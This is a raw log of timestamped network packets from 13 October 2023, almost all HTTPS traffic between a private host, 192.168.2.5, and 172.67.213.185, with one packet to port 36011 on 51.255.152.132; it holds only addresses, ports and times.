Oct 13, 2023 15:21:13.405524969 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.405569077 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.406765938 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.406780005 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.406840086 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.406852007 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.406900883 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.408030033 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.408045053 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.408102989 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.408114910 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.408159971 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.409133911 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.409147978 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.409207106 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.409219980 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.409267902 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.410562992 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.410583973 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.410633087 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.410645008 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.410674095 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.410695076 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.411876917 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.411897898 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.411958933 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.411971092 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.412019968 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.413470030 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.413484097 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.413543940 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.413557053 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.413603067 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.414666891 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.414680958 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.414738894 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.414750099 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.414798975 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.415954113 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.415966988 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.416028976 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.416042089 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.416088104 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.417565107 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.417577982 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.417644024 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.417656898 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.417705059 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.418473959 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.418488979 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.418545961 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.418557882 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.418602943 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.419672012 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.419684887 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.419742107 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.419754028 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.419800997 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.420278072 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.421220064 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.421231031 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.421324015 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.421335936 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.421386003 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.422277927 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.422291040 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.422355890 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.422368050 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.422414064 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.423965931 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.423980951 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.424026012 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.424036980 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.424067020 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.424875021 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.424891949 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.424932003 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.424943924 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.424971104 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.425759077 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.425776005 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.427228928 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.427242041 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.427298069 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.427309990 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.427354097 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.430228949 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.430242062 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.430315971 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.430327892 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.430373907 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.432066917 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.433135033 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.443837881 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.443851948 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.443918943 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.443933010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.443978071 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.447388887 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.447402000 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.447479010 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.447490931 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.447536945 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.448460102 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.448477030 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.448532104 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.448546886 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.448594093 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.449584961 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.449598074 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.449652910 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.449666023 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.449717999 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.450993061 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.451005936 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.451065063 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.451076984 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.451122999 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.452107906 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.452120066 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.452177048 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.452188969 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.452235937 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.453125954 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.453139067 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.453197956 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.453210115 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.453259945 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.454514027 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.454529047 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.454587936 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.454600096 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.454646111 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.455497980 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.455512047 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.455571890 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.455584049 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.455631018 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.456752062 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.456765890 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.456826925 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.456840038 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.456887007 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.457844973 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.457859039 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.457911015 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.457923889 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.457969904 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.458977938 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.458992004 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.459043026 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.459055901 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.459103107 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.460014105 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.460026026 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.460094929 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.460107088 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.460159063 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.461168051 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.461180925 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.461225986 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.461236954 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.461267948 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.461289883 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.462250948 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.462265968 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.462318897 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.462331057 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.462378025 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.463341951 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.463356018 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.463438988 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.463450909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.463505983 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.463581085 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.465500116 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.465513945 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.465578079 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.465590000 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.465641975 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.466253042 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.468015909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.468035936 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.468102932 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.468116045 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.468169928 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.468767881 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.469970942 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.469985962 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.470043898 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.470057011 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.470105886 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.472438097 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.472450972 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.472520113 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.472532034 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.472570896 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.472664118 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.474406958 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.474421978 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.474482059 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.474488020 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.474539995 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.475161076 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.476756096 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.476769924 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.476829052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.476835966 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.476874113 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.477754116 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.478656054 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.478669882 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.478746891 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.478753090 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.478795052 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.480637074 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.480652094 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.480714083 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.480720997 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.480760098 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.482891083 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.482904911 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.482959986 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.482968092 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.483005047 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.485074997 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.485088110 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.485140085 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.485146999 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.485182047 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.487057924 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.487071991 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.487124920 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.487132072 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.487166882 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.488003969 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.488662004 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.488675117 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.488740921 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.488748074 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.488787889 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.489962101 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.489975929 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.490046024 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.490053892 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.490094900 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.491338968 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.491352081 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.491416931 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.491425037 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.491462946 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.492870092 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.492882967 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.492964029 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.492976904 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.493025064 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.493304968 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:13.494112968 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.494126081 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.494189024 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.494200945 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.494246960 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.495230913 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.495249987 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.495316982 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.495332003 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.495378971 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.496133089 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.496145010 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.496202946 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.496215105 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.496262074 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.497098923 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.497112036 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.497169971 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.497181892 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.497240067 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.498208046 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.498351097 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.498363018 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.498420954 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.498431921 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.498478889 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.499459982 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.499473095 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.499522924 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.499537945 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.499584913 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.500540972 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.500554085 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.500610113 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.500638008 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.500719070 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.501527071 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.501540899 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.501601934 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.501620054 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.501662016 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.503154039 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.503168106 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.503241062 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.503266096 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.503297091 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.503318071 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.504240990 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.504255056 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.504303932 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.504322052 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.504350901 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.504400969 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.505340099 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.505353928 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.505420923 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.505436897 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.505466938 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.505631924 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.506109953 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.506124020 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.506172895 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.506182909 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.506210089 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.506711006 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.506733894 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.506747007 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.506791115 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.506803036 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.506829023 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.507653952 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.507673025 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.507716894 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.507735014 CEST	443	49739	172.67.213.185	192.168.2.5
Oct 13, 2023 15:21:13.507756948 CEST	49739	443	192.168.2.5	172.67.213.185
Oct 13, 2023 15:21:13.508234024 CEST	49739	443	192.168.2.5	172.67.213.185
